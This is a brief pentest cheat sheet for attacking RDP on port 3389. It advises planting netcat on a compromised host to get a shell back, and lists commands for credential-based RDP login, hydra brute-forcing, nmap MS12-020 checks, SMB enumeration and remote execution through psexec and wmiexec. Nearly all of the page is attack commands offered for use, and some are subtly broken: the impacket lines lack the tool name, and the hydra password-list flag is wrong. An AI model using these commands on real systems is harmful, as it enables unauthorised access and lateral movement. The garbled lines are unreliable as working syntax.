3389 - RDP

If you get RDP, first transfer nc.exe (windows) or netcat (Linux) to get the shell back on our attacking machine.

Comes in Handy commands:

Xfreerdp: xfreerdp /v:<IP> /u:<USER> /d:<DOMAIN> /p:<PASS> +clipboard /dynamic-resolution /drive:/opt,share
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <pass> <IP>
psexec: impacket- <user>:<pass>@<IP>
smbclient: smbclient \\\\<IP>\\ -U <user>
Nmap: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
Bruteforce: hydra -L <users.txt> -p <pass.txt> <IP> rdp
smbmap: smbmap -d <domain> -u <user> -p <pass> -H <IP>
wmiexec: impacket- <domain>/<user>:<pass>@<IP>

Last updated 1 year ago

Was this helpful?